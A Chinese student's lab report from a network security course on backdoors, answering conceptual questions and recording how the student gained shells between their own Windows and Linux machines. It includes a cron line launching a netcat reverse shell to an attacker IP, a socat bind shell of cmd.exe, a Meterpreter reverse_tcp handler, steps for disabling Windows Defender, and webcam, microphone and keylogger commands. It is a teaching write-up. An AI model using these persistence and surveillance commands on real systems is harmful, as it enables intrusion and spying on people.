20165309 《网络对抗技术》实验二:后门原理与实践

20165309 《网络对抗技术》实验二:后门原理与实践



1.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 在非官网上下载破解版软件或打开不请自来的邮件的时候,后门悄然而至,易使工作站和桌面系统被蓄意利用。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • win:点击钓鱼链接;修改注册表,增加后门自启动代码。
  • linux:实验中的cron启动。

(3)Meterpreter有哪些给你映像深刻的功能?

  • 拍照、录像、录音、获取击键记录、截屏......就是这些让人失去隐私的功能

(4)如何发现自己系统有没有被安装后门?

  • 使用查杀软件;
  • 留意不明端口和未知进程。

返回目录


2.实验总结与体会

(1)遇到的问题与解决

  • 问题一:运行可执行文件时在已关防火墙的状态下被Windows当成木马拦截:拒绝访问。

  • 解决一:除了控制面板里关掉防火墙,win10里内置的Windows Defender也要关闭,当时没有发现还有这个...如果依然拒绝访问的话,可以添加排除项...在多次尝试失败后,还可以右键可执行文件->属性->安全->编辑权限。重新生成和传送后就可以运行了~


  • 问题二:报错Cannot allocate memory

  • 解决二:这个报错的直译是:无法分配内存。我想到了是因为内存不足,所以设置虚拟机的内存为4G(要分配的比原先大),解决问题。

(2)实验感受

跟着老师的实验指导和学姐学长们的经验博客,完成本次实验其实很容易。这次实验帮助我掌握了后门的原理,也让我在一次次利用后门的攻击中有了更直观的感受(可能还有一丝丝成功攻击了自己主机的兴奋...??)。今后一定要增强安全防范意识,定期查杀,以免自己的隐私和电脑控制权落入他人之手。

返回目录


3.实践过程记录

(0)准备工作

  • 查看本机IP地址(我在实验过程中连了3处地方的Wifi,所以换了3组IP,给自己增加了麻烦...劝告大家要使用固定的网络):
    • Windows下:ipconfig
    • Linux下:ifconfig -a(显示全部接口信息)
  • 常用后门工具——NC
    • 基本步骤是:打开监听->反弹连接->获取shell(具体指令可见下方截屏)
      • Win获得Linux Shell
      • Linux获得Win Shell
      • nc传输数据

(1)使用netcat获取主机操作Shell,cron启动

注:此时Win是攻击方,Linux是受害方
  • 在Win里用ncat.exe -l -p 5309监听5309端口

  • 在Linux环境下,用crontab -e指令编辑定时任务,选择基本的vim编辑器("3")

  • vim编辑器中,在最后一行插入08 * * * * /bin/netcat 10.43.34.219 5309 -e /bin/sh(这里的IP地址为Win攻击机的IP)并 :wq!保存退出。

  • 上述指令表示在每个小时的第8分钟反向连接Win主机的5309端口。设置规则我们可以学习:Linux定时任务Crontab命令详解

  • 在8分之前,Win里输入指令,屏幕上没有反应,当8分时,Win就获得了Linux的shell,指令的内容则显示了出来:

(2)使用socat获取主机操作Shell, 任务计划启动

注:此时Win是受害方,Linux是攻击方
  • 在Win的计算机管理中创建任务并新建触发器,在操作的程序或脚本中添加上socat.exe的路径,在参数栏中填写tcp-listen:5309 exec:cmd.exe,pty,stderr,把cmd.exe绑定到端口5309,同时将stderr重定向到stdout上:
  • 按快捷键win+L锁定计算机,创建的任务就开始运行了。
  • 此时在Linux中输入指令socat - tcp:172.30.1.13:5309 ,发现成功获得了Win的cmd shell:

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

注:此时Win是受害方,Linux是攻击方
  • Linux中生成后门程序(命令见下图)
  • 使用ncat传输已生成的后门程序文件:
    • Win中监听并保存后门程序
    • Linux再向Win传输后门程序

  • Linux里打开一个终端,使用msfconsole指令进入msf控制台。
  • 接着输入use exploit/multi/handler使用监听模块,设置payload。
  • set payload windows/meterpreter/reverse_tcp使用和生成后门程序时相同的payload,然后设置IP和端口号:
  • Linux执行监听,Win运行后门,于是Linux获得了Win主机的连接,并且得到了远程控制的shell:

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

注:需重复上一环节操作至exploit,此时Win是受害方,Linux是攻击方
  • 使用webcam_snap获取目标主机摄像头:
  • 使用screenshot获取目标主机的截屏:
  • 使用record_mic指令可以截获一段音频
  • 使用getuid查看当前目标主机用户:
  • 使用keyscan_start记录击键的过程,使用keyscan_dump读取击键记录:

返回目录

posted @ 2019-03-24 20:56  20165309吴思佳  阅读(176)  评论(0编辑  收藏  举报